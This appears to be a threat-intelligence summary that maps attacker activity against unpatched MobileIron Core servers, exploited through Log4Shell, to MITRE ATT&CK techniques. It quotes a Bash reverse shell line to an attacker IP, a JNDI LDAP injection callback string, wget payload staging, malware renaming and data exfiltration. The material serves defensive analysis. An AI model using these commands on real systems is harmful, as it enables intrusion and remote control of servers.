MobileIron Log4Shell Exploitation Survey | Forged in Fire

MITRE Techniques

• [T1190] Exploit Public-Facing Application – Exploitation of CVE-2021-44228 on MobileIron Core with PoC available for unpatched systems. Quote: “Proof-of-concept (PoC) code quickly became available to exploit the vulnerability in unpatched MobileIron systems.”
• [T1105] Ingress Tool Transfer – Adversaries downloaded and staged payloads on the MobileIron server (e.g., via wget). Quote: “wget to download and stage their payload on the MobileIron server.”
• [T1059.004] Unix Shell – Post-exploitation reverse shell activity using Unix shell commands (e.g., Bash reverse shell). Quote: “The base64-encoded string decodes to the following reverse shell payload (Figure 2). bash -i>& /dev/tcp/103.242.133[.]48/8085 0>&1.”
• [T1027] Obfuscated/Encoded Files or Information – Use of base64-encoded payloads for the reverse shell. Quote: “base64-encoded reverse shell payload” and later “Fully decoded command…”
• [T1133] External Remote Services – Persistence via VPN infrastructure (SoftEther VPN) to maintain access. Quote: “use of SoftEther VPN to maintain access to a system.”
• [T1071.001] Web Protocols – C2 and data exfiltration conducted over web protocols, including HTTP/LDAP-like callbacks. Quote: “ldap://198.13.40[.]130:1389/Deserialization/URLDNS/335b5282.dns.1433.eu[.]org” and “GET /mifs/images/wtower_in.png HTTP/1.1”
• [T1005] Data from Local System – Exfiltration of the MIFS database and other sensitive data. Quote: “The MIFS database contains sensitive data, including device information, password history, and other data necessary for device management.”
• [T1036] Masquerading – Renaming an executable to avoid detection. Quote: “They renamed the KEYPLUG.LINUX binary to .kernel to hide the file with the hidden file attribute.”
• [T1041] Exfiltration Over C2 Channel – Exfiltration of registry data and other files to attacker infrastructure. Quote: “exfiltrated the exported registry data to their infrastructure using the PSCP utility.”